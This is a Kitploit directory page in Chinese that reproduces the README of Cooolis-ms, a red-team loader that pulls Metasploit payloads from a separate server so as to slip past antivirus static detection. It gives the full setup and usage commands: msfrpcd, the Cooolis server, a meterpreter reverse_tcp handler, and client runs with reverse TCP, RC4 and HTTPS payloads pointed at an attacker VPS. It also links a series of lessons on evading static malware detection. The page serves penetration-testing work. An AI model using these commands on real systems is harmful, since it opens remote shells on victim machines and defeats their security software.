Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Cooolis-ms — Cooolis-ms是一个包含了Metasploit Payload Loader、Cobalt Strike External C2 Loader、Reflective DLL injection的代码执行工具,它的定位在于能够在静态查杀上规避一些我们将要执行且含有特征的代码,帮助红队人员更方便快捷的从Web容器环境切换到C2环境进一步进行工作。 | Kitploit
工具/GitHubGitHub/rvn0xsy/cooolis-ms
渗透测试框架漏洞利用框架Payload生成IDS/IPS规避Shellcode后渗透利用命令与控制红队Shellcode 生成Payload 开发
GitHubrvn0xsy/cooolis-ms

Cooolis-ms

9281367个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Cooolis-ms是一个包含了Metasploit Payload Loader、Cobalt Strike External C2 Loader、Reflective DLL injection的代码执行工具,它的定位在于能够在静态查杀上规避一些我们将要执行且含有特征的代码,帮助红队人员更方便快捷的从Web容器环境切换到C2环境进一步进行工作。

查看仓库网站

Cooolis-ms

README

Cooolis-ms 是一个支持Metasploit Framework RPC的一个服务端,用于给Shellcode和PE加载器工作,在一定程度上绕过反病毒软件的静态查杀,同时可以让Cooolis-ms服务端与Metasploit服务器进行分离。

加载器执行流程:

  1. 连接Cooolis-Server
  2. Cooolis-Server连接Metasploit RPC服务端
  3. 取回Payload然后发送回加载器

核心技术:

  • 静态恶意代码逃逸(第六课)

该项目的优点

  • 体积小(<600KB)
  • 支持Metasploit所有Payload
  • 参数设置简单
  • 单文件
  • 架构分离

你可以参考这里,写出自己的好项目

  • 静态恶意代码逃逸(第一课)
  • 静态恶意代码逃逸(第二课)
  • 静态恶意代码逃逸(第三课)
  • 静态恶意代码逃逸(第四课)
  • 静态恶意代码逃逸(第五课)
  • 静态恶意代码逃逸(第六课)
  • 静态恶意代码逃逸(第七课)
  • 静态恶意代码逃逸(第八课)
  • 静态恶意代码逃逸(第九课)

如何安装

选择一 > Docker部署(推荐)

Bilibili:

China Bilibili

root@kitploit:~
$ git clone https://github.com/Rvn0xsy/Cooolis-ms.git
$ cd Cooolis-ms/Docker
$ docker-compose up -d

默认监听端口:8899

选择二 > 源码部署

root@kitploit:~
$ git clone https://github.com/Rvn0xsy/Cooolis-ms.git
$ cd Cooolis-ms
$ pip3 install -r requirements.txt
$ python3 server.py -h

如何使用

如果你使用了Docker进行部署,请直接从第三步开始。

假设这是我的VPS: 10.20.56.41

第一步 启动Metasploit RPC服务端

启动Metasploit RPC服务端:

root@kitploit:~
$ msfrpcd -U msf -P msf -u /api/1.0/ -a 127.0.0.1

第二步 启动Cooolis-ms服务端

使得它连接到RPC,并且监听一个端口,用来发送载荷:

root@kitploit:~
$ python3 server.py -U msf -P msf -H 127.0.0.1 -p 55553 -s -v -l 8899 -S 10.20.56.41

第三步 配置Metasploit监听器

root@kitploit:~
msf5 > use exploit/multi/handler
msf5 > set payload windows/meterpreter/reverse_tcp
msf5 > set LHOST  10.20.56.41
msf5 > set LPORT 8876
msf5 > exploit -j

第四步 启动Cooolis-ms客户端

root@kitploit:~
Cooolis-ms.exe -p windows/meterpreter/reverse_tcp -o LHOST=10.20.56.41,LPORT=8876,Format=dll -H 10.20.56.41 -P 8899

Q&A : 是否支持RC4加密的Payload?

  • windows/meterpreter/reverse_tcp_rc4:
root@kitploit:~
Cooolis-ms.exe -p windows/meterpreter/reverse_tcp_rc4 -o LHOST=10.20.56.41,LPORT=8876,RC4PASSWORD=rc4_password,Format=dll -H 10.20.56.41 -P 8899
  • windows/meterpreter_reverse_https
root@kitploit:~
Cooolis-ms.exe -p windows/meterpreter_reverse_https -o LHOST=10.20.56.41,LPORT=8876,LURI=/api/,Format=dll -H 10.20.56.41 -P 8899
  • windows/meterpreter/bind_tcp_rc4
root@kitploit:~
Cooolis-ms.exe -p windows/meterpreter/bind_tcp_rc4 -o RHOST=10.20.56.11,LPORT=8876,LURI=/api/,Format=dll -H 10.20.56.41 -P 8899
  • 其他... 自由发挥

提示:

  1. -o参数后的值需要和msf的监听器配置一致。
  2. 由于本项目依赖MemoryModule这个开源项目,因此只能支持DLL格式的PAYLOAD。需要在-o参数后添加Format=dll

关于其他

如果你觉得这个项目不错,请给我一个Star~

issue

我要提交建议或问题

LICENSE

GNU General Public License v3.0

下载工具